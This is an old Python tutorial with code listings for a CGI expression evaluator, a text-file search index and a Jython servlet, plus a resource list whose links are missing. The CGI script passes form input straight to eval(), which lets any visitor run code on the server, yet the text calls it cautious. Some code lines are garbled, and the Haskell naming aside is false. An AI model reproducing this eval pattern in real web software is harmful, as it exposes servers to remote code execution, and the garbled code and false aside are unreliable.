The shell is not the only way to run scripts. Web servers — such as Apache, for example — are popular ways to run scripts via the CGI standard. Listing Two contains a CGI script to evaluate expressions.
Listing Two: A cgi Script: exp.cgi
1 #!/usr/local/bin/python
2 from math import *
3 import cgi, sys
4
5 expression = ”
6 form = cgi.FieldStorage()
7 if form.has_key(‘expr’):
8 expression = form['expr'].value
9 try: result = eval(expression)
10 except:
11 error, detail, etcetc = sys.exc_info()
12 result = : error: ‘+str(error)+’, ‘+str(detail)
13
14 print ‘Content-type: text/html’
15 print
16 if expression: print ‘<p>’,expression,’=',result,’</p>’
17
18 print ‘<p><form action=”./exp.cgi”>’
19 print ‘Expression: <input type=”text” name=”expr”></input>’
20 print ‘</form></p>’
After placing this script in your cgi-bin directory, visiting from a browser will activate the script.
This script is more complicated than the first because it takes precautions against irregular input. Line 5 binds the name expression to ”, the empty string. Line 6 calls the function FieldStorage of the cgi module, binding the result to the name form, allowing access to the form data. The object bound to the name form is a “dictionary” in Python (similar to a Perl “hash” or a C++ “std::map”). Using the name of a field from the form as the “index” into this object retrieves the field’s value.
Line 7 checks to see if the form included a field named “expr“; if not, the name expression remains bound to the empty string, so that the if statement on line 16 later evaluates it as false and makes no attempt to emit the expression and the result of its evaluation.
If the form does have a field named “expr,” line 8 binds its value to the name expression, and line 9 tries to evaluate the expression with the eval function and binds the result to the name result. Line 9 starts with a try clause, so any error it might raise is caught by the corresponding except clause in line 10, in which case lines 11-12 bind result to an error message. The + operators on line 12 perform string concatenation, not addition, since the objects they operate on are strings, not numbers.
Finally, lines 14-15 and 18-20 unconditionally emit the HTML form needed to access this script. Thus, the first time you visit the script’s URL, you’ll just get the form; when you fill in and submit the form, you get the result and the form again, in case you want to ask for another result.
You may have noticed that neither the if statement nor the except clause have any punctuation to delimit what is contained within their scopes. This is by design; all groupings of statements, such as the guarded block of an if statement or the statements within an except clause, are done by indentation; grouped statements are aligned with each other and shifted rightwards. Spaces and tabs can be intermixed and Python considers tabs to be equivalent to eight spaces, but it’s generally best to use all spaces.
Python uses neither keywords nor punctuation for statement grouping — a syntactic minimalism shared by a few other languages, including Haskell (named after mathematician Curry Haskell) and Occam (named in honor of medieval philosopher William of Occam, known for his principle, “Occam’s Razor”). Python, in case you didn’t know, is named in honor of Monty Python’s Flying Circus.
A Simple Search Engine in Python
Let’s take a look at some more of the modules in Python’s library. Say you have a directory full of important text files and often grep through them looking for certain words. Let’s use Python to index these files, then build a small search engine so we can search through them quicker. Take a look at Listing Three.
Listing Three: Creating An Index
1 import glob, fileinput, re, shelve
2
3 aword = re.compile(r’\b[\w-]+\b’)
4 index = {}
5
6 for line in fileinput.input(glob.glob(‘*.txt’)):
7 location = fileinput.filename(), fileinput.filelineno()
8 for word in aword.findall(line.lower()):
9 index.setdefault(word,[]).append(location)
10
11 shelf = shelve.open(‘shelf’,'n’)
12 for word in index:
13 shelf[word] = index[word]
14 shelf.close()
Line 3 binds the name aword to a regular expression object identifying a word: one or more word characters or hyphens between word boundaries. Line 4 binds the name index to an empty dictionary.
Line 6 loops over every line of all files that end with .txt in the current directory. Line 7 binds the name location to the current filename and line number. Line 8 loops over all the words in the line (using a lowercased copy of the string in line, as we are interested in case-independent searching).
Line 9 is executed for each word in each line. The setdefault method of the dictionary index returns the existing index entry for the word, or if the word was not yet in the index, setdefault binds a new entry to the default value [] (an empty list), and returns it. The append method adds the location value to the list.
When the loop is done, our index is stored in the dictionary index. We need to persist the index to disk in an easily searchable form. This is done with the shelve module. Line 11 opens a new shelf object in the file shelf and binds the name shelf to the resulting Python object. Lines 12-13 persist the dictionary to the shelf, element by element. Finally, line 14 closes the shelf object, and we’re done; our index is on disk, ready for searching.
Listing Four contains a simple script that uses the index to search for words and displays three lines centered around each occurrence.
Listing Four: Using An Index
1 import shelve, sys, linecache
2
3 shelf = shelve.open(‘shelf’, ‘r’)
4
5 for word in sys.argv[1:]:
6 try:
7 locations = shelf[word.lower()]
8 except KeyError:
9 print word+’: not found’
10 else:
11 print word+’:’
12 for file, line in locations:
13 print ‘ In file’,file+’:’
14 for delta in -1,0,1:
15 aline = linecache.getline(file, line+delta)
16 if aline: print ‘ ‘,aline,
Line 3 opens the ‘shelf’ file in read-only mode and binds the resulting Python object to the name shelf. Line 5 loops over each word (passed as arguments to the script); the construct sys.argv[1:], called a list slice, returns all the command-line arguments passed to the program. Line 7 looks up the list of locations for the word (lower-cased, again, to make the search case insensitive). The actual lookup is within the try statement in line 6, so that if the word is not in the index, the except clause in lines 8 and 9 handle the error by printing the “not found” message. The else clause in line 10 executes if no error was raised (i.e., if the lookup succeeded).
In this case, we print the word (line 11), then loop over the list of locations (line 12), printing the file name for each (line 13). The loop in lines 14-16 gets and prints the lines immediately before and after the line in which the word occurs, applying deltas of -1, 0, and 1 to the line number bound to line. The getline function from the linecache module is called with a filename and line number as arguments and returns the requested line (as a string, complete with trailing newline). If the requested line is not found (as might happen in our script, when a word is found on the first or last line of a file) then getline returns an empty string.
The if statement in line 16 prevents the print statement from printing nonexistent lines. The final comma causes the print statement to not emit a newline because the aline string already ends with one.
Extending and Embedding
Another feature that makes Python fun to use is its C-level API. It’s easy to extend Python with new functionality and to embed a Python interpreter in another application. There are a lot of extension modules written in C you can download and use, and you can find Python embedded as the scripting language of many applications.
The Simplified Wrapper and Interface Generator, SWIG (), makes it easy to wrap existing C libraries into Python extensions. If you like C++, you have even more choices. The Boost Python library () lets you turn your C++ libraries into Python extensions using all the power of C++’s templates.
But I Need 100 Percent Pure Java
And if you want to access Java classes from within Python, you’re in luck! Jython () implements the Python language in 100 percent pure Java. You need a highly compliant JVM (Kaffe doesn’t work, for example, but Javasoft releases do), because Jython exercises the Java specs to the limit. But what you get is awesome; your Python code can import and use any existing Java class just as if it were a Python module. No wrapping, no adaptation; the Jython runtime does it for you via Java reflection. A simple Jython servlet is shown in Listing Five.
Listing Five: A Jython Servlet
1 import javax
2
3 class hello(javax.servlet.http.HttpServlet):
4 def doGet(self, request, response):
5 response.setContentType(‘text/html’)
6 out = response.getOutputStream()
7 out.write(”’<html><head><title>Hello World</title></head>
8 <body><p>Now <b>this</b> is simplicity!</p></body></html>”’)
9 out.close()
Check It Out!
As we have seen in this article, Python can be used to perform many different kinds of tasks. Python’s rich library of modules lets you apply it to almost any kind of programming endeavor: database munging, number-crunching, image processing, games, Web servers, even cryptography.
It’s good that Python can do so much, because that has a practical benefit: ease of software maintenance. Programs do need to be maintained, even if you thought of them as “throwaway” when you wrote them. If you use a scripting language that emphasizes concision, variety, and cleverness, going back to a script written months ago can be a harrowing experience. Python emphasizes clarity, simplicity, and readability so that revisiting your old scripts is fun, not a chore. The proof of the pudding is in the eating, and the proof of Python is in the programming. Give Python a try. You deserve it!
Resources
Main site, chock full of both material and links:
Mailing lists and newsgroups:
news://comp.lang.python
You can also mail any help request to help@python.org (volunteer helpers watch this address and will give you personalized help).
IDLE:
Tkinter:
Some of the popular applications that embed and/or are written in Python:
Zope:
Cooledit:
Blender:
PySol:
Extending Python:
Extending manual:
C API reference:
Boost Python:
SWIG:
Jython (Python on the Java Virtual Machine):
|
http://www.linux-mag.com/id/1025/
|
CC-MAIN-2016-44
|
refinedweb
| 3,066
| 62.98
|
On 01/25/2012 01:13 PM, Marc-André Lureau wrote: > Define PID_FORMAT and fix warnings for mingw64 x86_64 build. > > Unfortunately, gnu_printf attribute check expect %lld while normal > printf is PRId64. So one warning remains. > --- > src/rpc/virnetsocket.c | 4 ++-- > src/util/command.c | 10 +++++----- > src/util/util.h | 8 ++++++++ > src/util/virpidfile.c | 6 +++--- > 4 files changed, 18 insertions(+), 10 deletions(-) This failed 'make syntax-check': libvirt_unmarked_diagnostics src/util/command.c-2198- PID_FORMAT ") status unexpected: %s"), which may be a flaw in cfg.mk rather than an actual bug, but still one we should address. Also, I'm not quite convinced on your approach. While it's nice to hide the type behind a macro: > > +#ifdef _WIN64 > +/* XXX gnu_printf prefers lld while non-gnu printf expect PRId64... */ Libvirt should not be using non-gnu printf. What function call gave you that warning, so that we can fix it to use gnu printf? > +# define PID_FORMAT "lld" > +#else > +# define PID_FORMAT "d" > +#endif the decision should _not_ be based on _WIN64, but instead on a configure-time test on the underlying type of pid_t. And since _that_ gets difficult, I'd almost rather go with the simpler approach of: "%" PRIdMAX, (intmax_t) pid everywhere that we currently use "%d", pid -- Eric Blake eblake redhat com +1-919-301-3266 Libvirt virtualization library
Attachment:
signature.asc
Description: OpenPGP digital signature
|
https://www.redhat.com/archives/libvir-list/2012-January/msg01071.html
|
CC-MAIN-2017-17
|
refinedweb
| 226
| 59.19
|
3D computer graphics have many uses -- from games to data visualization, virtual reality, and beyond. More often than not, speed is of prime importance, making specialized software and hardware a must to get the job done. Special-purpose graphics libraries provide a high-level API, but hide how the real work is done. As nose-to-the-metal programmers, though, that's not good enough for us! We're going to put the API in the closet and take a behind-the-scenes look at how images are actually generated -- from the definition of a virtual model to its actual rendering onto the screen..
Terrain maps
Let's start by defining a
terrain map
. A terrain map is a function that maps a 2D coordinate
(x,y)
to an altitude
a
and color
c
. In other words, a terrain map is simply a function that describes the topography of a small area..
Transcendental terrains
We'll start by looking at a transcendental terrain -- fancyspeak for a terrain computed from sines and cosines:
public class TranscendentalTerrain implements Terrain { private double alpha, beta; public TranscendentalTerrain (double alpha, double beta) { this.alpha = alpha; this.beta = beta; } public double getAltitude (double i, double j) { return .5 + .5 * Math.sin (i * alpha) * Math.cos (j * beta); } public RGB getColor (double i, double j) { return new RGB (.5 + .5 * Math.sin (i * alpha), .5 - .5 * Math.cos (j * beta), 0.0); } }
Our constructor accepts two values that define the frequency of our terrain. We use these to compute altitudes and colors using
Math.sin() and
Math.cos(). Remember, those functions return values -1.0 <= sin(),cos() <= 1.0, so we must adjust our return values accordingly.
Fractal terrains
Simple mathematical terrains are no fun. What we want is something that looks at least passably real. We could use real topography files as our terrain map (the San Francisco Bay or the surface of Mars, for example). While this is easy and practical, it's somewhat dull. I mean, we've
been
there. What we really want is something that looks passably real
and
has never been seen before. Enter the world of fractals.
A fractal is something (a function or object) that exhibits self-similarity. For example, the Mandelbrot set is a fractal function: if you magnify the Mandelbrot set greatly you will find tiny internal structures that resemble the main Mandelbrot itself. A mountain range is also fractal, at least in appearance. From close up, small features of an individual mountain resemble large features of the mountain range, even down to the roughness of individual boulders. We will follow this principal of self-similarity to generate our fractal terrains.
Essentially what we'll do is generate a coarse, initial random terrain. Then we'll recursively add additional random details that mimic the structure of the whole, but on increasingly smaller scales. The actual algorithm that we will use, the Diamond-Square algorithm, was originally described by Fournier, Fussell, and Carpenter in 1982 (see Resources for details).
These are the steps we'll work through to build our fractal terrain:
We first assign a random height to the four corner points of a grid.
We then take the average of these four corners, add a random perturbation and assign this to the midpoint of the grid (ii in the following diagram). This is called the diamond step because we are creating a diamond pattern on the grid. (At the first iteration the diamonds don't look like diamonds because they are at the edge of the grid; but if you look at the diagram you'll understand what I'm getting at.)
We then take each of the diamonds that we have produced, average the four corners, add a random perturbation and assign this to the diamond midpoint (iii in the following diagram). This is called the square step because we are creating a square pattern on the grid.
- Next, we reapply the diamond step to each square that we created in the square step, then reapply the square step to each diamond that we created in the diamond step, and so on until our grid is sufficiently dense.
An obvious question arises: How much do we perturb the grid? The answer is that we start out with a roughness coefficient 0.0 < roughness < 1.0. At iteration n of our Diamond-Square algorithm we add a random perturbation to the grid: -roughnessn <= perturbation <= roughnessn. Essentially, as we add finer detail to the grid, we reduce the scale of changes that we make. Small changes at a small scale are fractally similar to large changes at a larger scale.
If we choose a small value for roughness, then our terrain will be very smooth -- the changes will very rapidly diminish to zero. If we choose a large value, then the terrain will be very rough, as the changes remain significant at small grid divisions.
Here's the code to implement our fractal terrain map:
public class FractalTerrain implements Terrain { private double[][] terrain; private double roughness, min, max; private int divisions; private Random rng; public FractalTerrain (int lod, double roughness) { this.roughness = roughness; this.divisions = 1 << lod; terrain = new double[divisions + 1][divisions + 1]; rng = new Random (); terrain[0][0] = rnd (); terrain[0][divisions] = rnd (); terrain[divisions][divisions] = rnd (); terrain[divisions][0] = rnd (); double rough = roughness; for (int i = 0; i < lod; ++ i) { int q = 1 << i, r = 1 << (lod - i), s = r >> 1; for (int j = 0; j < divisions; j += r) for (int k = 0; k < divisions; k += r) diamond (j, k, r, rough); if (s > 0) for (int j = 0; j <= divisions; j += s) for (int k = (j + s) % r; k <= divisions; k += r) square (j - s, k - s, r, rough); rough *= roughness; } min = max = terrain[0][0]; for (int i = 0; i <= divisions; ++ i) for (int j = 0; j <= divisions; ++ j) if (terrain[i][j] < min) min = terrain[i][j]; else if (terrain[i][j] > max) max = terrain[i][j]; } private void diamond (int x, int y, int side, double scale) { if (side > 1) { int half = side / 2; double avg = (terrain[x][y] + terrain[x + side][y] + terrain[x + side][y + side] + terrain[x][y + side]) * 0.25; terrain[x + half][y + half] = avg + rnd () * scale; } } private void square (int x, int y, int side, double scale) { int half = side / 2; double avg = 0.0, sum = 0.0; if (x >= 0) { avg += terrain[x][y + half]; sum += 1.0; } if (y >= 0) { avg += terrain[x + half][y]; sum += 1.0; } if (x + side <= divisions) { avg += terrain[x + side][y + half]; sum += 1.0; } if (y + side <= divisions) { avg += terrain[x + half][y + side]; sum += 1.0; } terrain[x + half][y + half] = avg / sum + rnd () * scale; } private double rnd () { return 2. * rng.nextDouble () - 1.0; } public double getAltitude (double i, double j) { double alt = terrain[(int) (i * divisions)][(int) (j * divisions)]; return (alt - min) / (max - min); } private RGB blue = new RGB (0.0, 0.0, 1.0); private RGB green = new RGB (0.0, 1.0, 0.0); private RGB white = new RGB (1.0, 1.0, 1.0); public RGB getColor (double i, double j) { double a = getAltitude (i, j); if (a < .5) return blue.add (green.subtract (blue).scale ((a - 0.0) / 0.5)); else return green.add (white.subtract (green).scale ((a - 0.5) / 0.5)); } }
In the constructor, we specify both the roughness coefficient
roughness and the level of detail
lod. The level of detail is the number of iterations to perform -- for a level of detail n, we produce a grid of (2n+1 x 2n+1) samples. For each iteration, we apply the diamond step to each square in the grid and then the square step to each diamond. Afterwards, we compute the minimum and maximum sample values, which we'll use to scale our terrain altitudes.
To compute the altitude of a point, we scale and return the closest grid sample to the requested location. Ideally, we would actually interpolate between surrounding sample points, but this method is simpler, and good enough at this point. In our final application this issue will not arise because we will actually match the locations where we sample the terrain to the level of detail that we request. To color our terrain, we simply return a value between blue, green, and white, depending upon the altitude of the sample point.
Tessellating our terrain
We now have a terrain map defined over a square domain. We need to decide how we are going to actually draw this onto the screen. We could fire rays into the world and try to determine which part of the terrain they strike, as we did in the previous article. This approach would, however, be extremely slow. What we'll do instead is approximate the smooth terrain with a bunch of connected triangles -- that is, we'll tessellate our terrain.
Tessellate: to form into or adorn with mosaic (from the Latin tessellatus).
To form the triangle mesh, we will evenly sample our terrain into a regular grid and then cover this grid with triangles -- two for each square of the grid. There are many interesting techniques that we could use to simplify this triangle mesh, but we'd only need those if speed was a concern.
The following code fragment populates the elements of our terrain grid with fractal terrain data. We scale down the vertical axis of our terrain to make the altitudes a bit less exaggerated.
double exaggeration = .7; int lod = 5; int steps = 1 << lod; Triple[] map = new Triple[steps + 1][steps + 1]; Triple[] colors = new RGB[steps + 1][steps + 1]; Terrain terrain = new FractalTerrain (lod, .5); for (int i = 0; i <= steps; ++ i) { for (int j = 0; j <= steps; ++ j) { double x = 1.0 * i / steps, z = 1.0 * j / steps; double altitude = terrain.getAltitude (x, z); map[i][j] = new Triple (x, altitude * exaggeration, z); colors[i][j] = terrain.getColor (x, z); } }
You may be asking yourself: So why triangles and not squares? The problem with using the squares of the grid is that they're not flat in 3D space. If you consider four random points in space, it's extremely unlikely that they'll be coplanar. So instead we decompose our terrain to triangles because we can guarantee that any three points in space will be coplanar. This means that there'll be no gaps in the terrain that we end up drawing.
|
http://www.javaworld.com/article/2076745/learn-java/3d-graphic-java--render-fractal-landscapes.html
|
CC-MAIN-2014-15
|
refinedweb
| 1,742
| 63.09
|
Scroll down to the script below, click on any sentence (including terminal blocks!) to jump to that spot in the video!
gstreamer0.10-ffmpeg
gstreamer0.10-plugins-goodpackages.
Let's make this date dynamic! The field on
Question that we're going to use is
$askedAt, which - remember - might be null. If a
Question hasn't been published yet, then it won't have an
askedAt.
Let's plan for this. In the template, add
{% if question.askedAt %} with an
{% else %} and
{% endif %}
If the question is not published, say
(unpublished).
In a real app, we would probably not allow users to see unpublished questions... we could do that in our controller by checking for this field and saying
throw $this->createNotFoundException() if it's null. But... maybe a user will be able to preview their own unpublished questions. If they did, we'll show
unpublished.
The easiest way to try to print the date would be to say
{{ question.askedAt }}.
But... you might be shouting: "Hey Ryan! That's not going to work!".
And... you're right:
Object of class
DateTimecould not be converted to string
We know that when we have a
datetime type in Doctrine, it's stored in PHP as a
DateTime object. That's nice because
DateTime objects are easy to work with... but we can't simply print them.
To fix this, pass the
DateTime object through a
|date() filter. This takes a format argument - something like
Y-m-d H:i:s.
When we try the page now... it's technically correct... but yikes! This... well... how can I put this politely: it looks like a backend developer designed this.
Whenever I render dates, I like to make them relative. Instead of printing an exact date, I prefer something like "10 minutes ago". It also avoids timezone problems... because 10 minutes ago makes sense to everyone! But this exact date would really need a timezone to make sense.
So let's do this. Start by adding the word "Asked" back before the date. Cool.
To convert the
DateTime into a friendly string, we can install a nice bundle. At your terminal, run:
composer require knplabs/knp-time-bundle
You could find this bundle if you googled for "Symfony ago". As we know, the main thing that a bundle gives us is more services. In this case, the bundle gives us one main service that provides a Twig filter called
ago.
It's pretty awesome. Back in the template, add
|ago.
We're done! When we refresh now... woohoo!
Asked 1 month ago
Next: let's make the homepage dynamic by querying for all of the questions in the database and rendering them. Along the way, we're going to learn a secret about the repository object.
// } }
|
https://symfonycasts.com/screencast/symfony5-doctrine/ago
|
CC-MAIN-2022-33
|
refinedweb
| 463
| 77.23
|
Shortest Code ContestWrite a piece of code to solve some mathematical expressions.
These mathematical expressions will be very simple - each expression will consist of two numbers and a single operation.
All numbers will be positive integers less than 100, and the only operations will be +,- and *.
There will be multiple test cases - the first line will indicate the number of tests.
Oh, I almost forgot to mention: you can't use semicolons!
Your score will be (86 / N)2 x 10, where N is the number of non-whitespace characters in your code.
Sample Input
3 6*7 67-25 31+11
Sample Output
42 42 42
All Submissions
Best Solutions
Point Value: 10 (partial)
Time Limit: 2.00s
Memory Limit: 16M
Added: Dec 14, 2008
Languages Allowed:
C++03, C, C++11
The whole reason semicolons are disallowed is to make the problem somewhat challenging.
e.g. int main(int a, int b) ...
using namespace std;? oO
This won't work in Visual C++, though.
Edit: #include <list.h> is better
It's not like we even know C (or at least I don't), so you can just try figure it out.
here
However I made the scoring curve a bit more lenient. Edit: Can't make it too easy
PS. there are 79 answers accepted?!?
|
https://wcipeg.com/problem/expr#comment765
|
CC-MAIN-2022-40
|
refinedweb
| 218
| 75.61
|
Define: Lambda
Lambda is a functional language concept within Haxe that allows you to apply a function to a list or iterators. The Lambda class is a collection of functional methods in order to use functional-style programming with Haxe.
It is ideally used with
using Lambda (see Static Extension) and then acts as an extension to
Iterable types.
On static platforms, working with the
Iterable structure might be slower than performing the operations directly on known types, such as
Array and
List.
The Lambda class allows us to operate on an entire
Iterable at once.
This is often preferable to looping routines since it is less error prone and easier to read.
For convenience, the
Array and
List class contains some of the frequently used methods from the Lambda class.
It is helpful to look at an example. The exists function is specified as:
static function exists<A>( it : Iterable<A>, f : A -> Bool ) : Bool
Most Lambda functions are called in similar ways. The first argument for all of the Lambda functions is the
Iterable on which to operate. Many also take a function as an argument.
Lambda.array,
Lambda.listConvert Iterable to
Arrayor
List. It always returns a new instance.
Lambda.countCount the number of elements. If the Iterable is a
Arrayor
Listit is faster to use its length property.
Lambda.emptyDetermine if the Iterable is empty. For all Iterables it is best to use the this function; it's also faster than compare the length (or result of Lambda.count) to zero.
Lambda.hasDetermine if the specified element is in the Iterable.
Lambda.existsDetermine if criteria is satisfied by an element.
Lambda.indexOfFind out the index of the specified element.
Lambda.findFind first element of given search function.
Lambda.foreachDetermine if every element satisfies a criteria.
Lambda.iterCall a function for each element.
Lambda.concatMerge two Iterables, returning a new List.
Lambda.filterFind the elements that satisfy a criteria, returning a new List.
Lambda.map,
Lambda.mapiApply a conversion to each element, returning a new List.
Lambda.foldFunctional fold, which is also known as reduce, accumulate, compress or inject.
This example demonstrates the Lambda filter and map on a set of strings:
using Lambda; class Main { static function main() { var words = ['car', 'boat', 'cat', 'frog']; var isThreeLetters = function(word) return word.length == 3; var capitalize = function(word) return word.toUpperCase(); // Three letter words and capitalized. trace(words.filter(isThreeLetters).map(capitalize)); // [CAR,CAT] } }
This example demonstrates the Lambda count, has, foreach and fold function on a set of ints.
using Lambda; class Main { static function main() { var numbers = [1, 3, 5, 6, 7, 8]; trace(numbers.count()); // 6 trace(numbers.has(4)); // false // test if all numbers are greater/smaller than 20 trace(numbers.foreach(function(v) return v < 20)); // true trace(numbers.foreach(function(v) return v > 20)); // false // sum all the numbers var sum = function(num, total) return total += num; trace(numbers.fold(sum, 0)); // 30 } }
|
http://haxe.org/manual/std-Lambda.html
|
CC-MAIN-2017-39
|
refinedweb
| 491
| 51.14
|
If you’re looking to build a simple web application with a nice frontend, you may think your options are limited as far as what languages to use. For a long time, when I thought about web development, Python never really sprung to mind as an ideal language to use, mostly because I thought it was reserved purely for scripting and other basic operating system-level functions.
As it happens, Python has a fantastic microframework called Flask—which is used to power some incredibly popular websites such as Pinterest, LinkedIn and the community web page for Flask. One of the things that concerned me the most when beginning to use this framework (along with Python itself for such a task) was the ability to interact with a database such as MySQL. Although there are toolkits available such as SQLAlchemy, which are very powerful indeed, I found this to be a little complex for my basic requirements and instead I set out to find an easier way to interact with MySQL. This article will show you what I discovered!
Here’s what we’re going to cover. Grab a coffee and let’s get started!
- Setting up our development environment
- Create a basic Flask application which displays a “Hello, World!” web page
- Introduce database queries to our application
- Conclusion
Setting up the development environment
There are many seasoned Python developers who will create and maintain their scripts or applications from the command line using tools like Vim (on Linux). However, if you’re fairly new to Python development, then it’s important that you understand the need for an IDE (at least when starting out). The reason for this? Python is quite particular on indentation within your code, and if you get it wrong, you’ll run into some very strange problems indeed. Using a decent IDE will provide you with tips as you go along when it detects mistakes you may have made. I’ve found this to be hugely beneficial since starting Python development, and I really encourage it.
So, which IDE should I use?!
There are many different IDEs available, including complex notepad editors that have Python syntax plugins, such as Visual Studio Code. These tend to miss out on some key features of a decent IDE, though, and as such, I would highly recommend using PyCharm, which is by far widely recognised in the community as the de facto gold standard IDE for Python development. There are community, open-source(!), and paid versions available, and in my short coding career with Python, I’ve found the community version to be more than enough for me.
So without further ado, let’s get started! For the purposes of this article, I will be using PyCharm on Windows 10 (there is a version for Linux and MacOS too, so if you’re following along, please keep an eye out for minor differences).
Let’s start by firing up PyCharm and selecting New Project from the File menu:
Set the name of the project and click Create when you’re ready to proceed.
From the same File menu, select New -> Python File, give it a name, and click OK:
Now we can populate our new file with the code to get us up and running with a basic Flask “Hello, World!” application. At this point, if you haven’t used Flask before on your system, then you’ll need to install it using pip. This can be done with one command from your terminal: pip3 install flask
from flask import Flask app = Flask(__name__) @app.route('/') def hello_world(): return 'Hello, World!'
Once you’ve pasted the above code into your IDE, you can test it out by navigating to your project folder in the terminal and running the following commands:
# set FLASK_APP=mysql-test.py (Use ‘export’ instead of ‘set’ if running under Linux or MacOS) # python -m flask run
You should see something similar to the following:
This means that a local web server is now listening on port 5000 and you should be able to browse to the URL above and see “Hello, World!” in your web browser. Let’s try it!
Great! So we now have the basis for our application up and running.
Introducing database queries to our application
Now we will want to add some database functionality. MySQL actually publishes an “employees” sample database, which allows one to test database queries and get to grips with SQL, so we’ll use that for our example. At this point, I will be restoring the database into a local MySQL instance on my Windows 10 machine. Doing this on a Linux system with MySQL installed is just as easy.
The easiest way to get this test database is simply to clone it locally using the following command:
git clone
If you are on a Linux machine or have the MySQL client installed locally on your Windows machine, go ahead and run the following commands whilst in the test_db directory:
# mysql < employees.sql
If you are running the command above in some environments, you may need to specify a username and password. This can be done with the -u and -p flags respectively.
Once we have imported the employee data, we can then update our main Python script by removing the “Hello, World!” app route and replacing it with a new one that will be the home for our database connection request. We’ll also be adding a small database class to house the database query itself.
from flask import Flask, render_template import pymysql app = Flask(__name__) class Database: def __init__(self): host = "127.0.0.1" user = "test" password = "password" db = "employees" self.con = pymysql.connect(host=host, user=user, password=password, db=db, cursorclass=pymysql.cursors. DictCursor) self.cur = self.con.cursor() def list_employees(self): self.cur.execute("SELECT first_name, last_name, gender FROM employees LIMIT 50") result = self.cur.fetchall() return result @app.route('/') def employees(): def db_query(): db = Database() emps = db.list_employees() return emps res = db_query() return render_template('employees.html', result=res, content_type='application/json')
Furthermore, we’ll add a basic HTML page with a table to illustrate our database query in action. For this, you’ll need to create a “templates” folder, as Flask requires you to have HTML templates in this structure to work. Once you have done this, your structure should look similar to the following:
The contents of the HTML page are as follows:
{% if result %}
{% for row in result %}
{% endfor %} {% endif %}
If you copy and paste the code above and run your application, you should now see something similar to the following in your browser (please note that we have limited the query output to 50 rows in order to not crash your browser!):
Conclusion
As you can see from this basic example, interacting with MySQL and presenting data on a web page using Python and Flask is actually incredibly simple. If you are fairly new to Python web development, then this is a good way to get to grips with how things work. That being said, once you start to advance and your requirements become more complex, looking at something like SQLAlchemy may be a better route to go down.
Resources
- The code for this tutorial can be found at:
- The Flask microframework:
- W3Schools HTML tables introduction:
- Jinja2 template engine documentation:
- PyMySQL (MySQL client for Python):
- More information on SQLAlchemy:
|
https://sweetcode.io/flask-python-3-mysql/
|
CC-MAIN-2021-21
|
refinedweb
| 1,231
| 59.13
|
Hi all, I'm witnessing some funny behavior in my training val_loss and val_acc. It will wobble around all over the place instead of being consistent. I've tried a few architectures on sample redux data and it seems to be happening architecturally agnostic. My hypothesis is that it has something to do with the data_aug being too different from the val set, has anyone run into this before? Especially, where a val_loss of 7 is sandwiched between .13 and .47?
I've taken the vggbn model and kept the last 3 conv layers and 1st dense layer trainable. Then I've popped everything after that and added my own tail.
Epoch 1/10
125/125 [==============================] - 48s - loss: 0.4372 - acc: 0.8295 - val_loss: 0.3996 - val_acc: 0.9060
Epoch 2/10
125/125 [==============================] - 40s - loss: 0.1999 - acc: 0.9220 - val_loss: 1.0032 - val_acc: 0.7903
Epoch 3/10
125/125 [==============================] - 48s - loss: 0.1715 - acc: 0.9315 - val_loss: 0.2281 - val_acc: 0.9215
Epoch 4/10
125/125 [==============================] - 47s - loss: 0.1418 - acc: 0.9440 - val_loss: 0.1141 - val_acc: 0.9690
Epoch 5/10
125/125 [==============================] - 40s - loss: 0.1407 - acc: 0.9505 - val_loss: 0.6629 - val_acc: 0.8543
Epoch 6/10
125/125 [==============================] - 40s - loss: 0.1143 - acc: 0.9595 - val_loss: 0.5840 - val_acc: 0.9194
Epoch 7/10
125/125 [==============================] - 40s - loss: 0.1154 - acc: 0.9630 - val_loss: 0.1162 - val_acc: 0.9731
Epoch 8/10
125/125 [==============================] - 40s - loss: 0.0913 - acc: 0.9675 - val_loss: 0.1349 - val_acc: 0.9628
Epoch 9/10
125/125 [==============================] - 40s - loss: 0.0978 - acc: 0.9645 - val_loss: 7.4255 - val_acc: 0.5362
Epoch 10/10
125/125 [==============================] - 40s - loss: 0.0995 - acc: 0.9625 - val_loss: 0.4757 - val_acc: 0.8988
A followup - I've tried modifying data augmentation which didn't do anything but modifying the validation shuffle=False and lowering the learning rate seems to have at least made it more consistent and better performing.
I don't think so - this paper talks about
"We also introduce a new type of ensemble composed of one or more full models and many specialist models which learn to distinguish fine-grained classes that the full models confuse. Unlike a mixture of experts, these specialist models can be trained rapidly and in parallel."
Distilling the Knowledge in a Neural Network -
Can somebody help me with this, I do not know why I'm getting this error ???
Also does this half the weights of the corresponding fc layers only or all the model's layers.. i believe model will have a lot more layers than fc_layers
Embarrassingly enough, I was stuck on this for a bit too until I looked about 10 lines up from there, where another var called model is declared within the scope of the get_fc_model function:
model
get_fc_model
def get_fc_model():
model = Sequential([
MaxPooling2D(input_shape=conv_layers[-1].output_shape[1:]),
Flatten(),
Dense(4096, activation='relu'),
It is confusing because a different variable called model is previously defined at the notebook level and holds the whole finetuned VGG model. Anyway, wanted to respond for completeness' sake, but hopefully this will save someone a bit of time too.
Hi,
In lesson 3 notebook vgg16bn is used while adding batchnorm instead of vgg16.
Why vgg16 can not be used? What is the basic difference between both of them.
Thanks & Regards
I am having difficulty following the examples. The code in the video and lesson 3 notebook do not match and I am not sure to either follow the lesson 3 notebook or the imagenet_batchnorm notebook. And also if i have to follow the imagenet_batchnorm notebook, do i need to download the imagenet data as suggest under the solution section.
Do i have to download the imagenet data for the cats and dogs batch normalization as suggested under the solution section in imagenet_batchnorm1 notebook.
Hi! I am having difficulties fine tuning the other, deeper, Dense Layers in VGG when trying to finish the State Farm Kaggle competition. I have fine tuned the last Dense Layer and would like to train the two other fully connected layers. Did this by using directly “vgg.finetune”.
Not much of a coder as I started learning Python like a bit over a month ago, so this might be a “silly” question, but I can’t figure out what I should do.
Do I need to import something from keras.models or keras.layers to make this work?
Or do I need to replace “first_dense_idx” with the index of the first dense layer? If so, how can I find out what the index is?
Solved it myself.
You have to first define layers = vgg.model and then layers = model.layers
layers = vgg.model
layers = model.layers
And you get the index of layers by typing the following:
for i, layer in enumerate(model.layers):
print(i, layer.name)
And then you can define which layers to set to trainable.
for example:
for layer in model.layers[33:]:
layer.trainable = true
hi @rachel ,
was referring the mnist notebook which provides an end to end model for doing regularization.
In creating a model with single hidden layer, jeremy uses an activation layer = ‘softmax’. The snapshot is shown below:
May i know why should softmax layer be used in an intermediate layer? My understanding is it should be used only in the last layer…
|
http://forums.fast.ai/t/lesson-3-discussion/186?page=10
|
CC-MAIN-2017-51
|
refinedweb
| 892
| 70.29
|
I'm trying to get products for a project i'm working on from this page:lazada
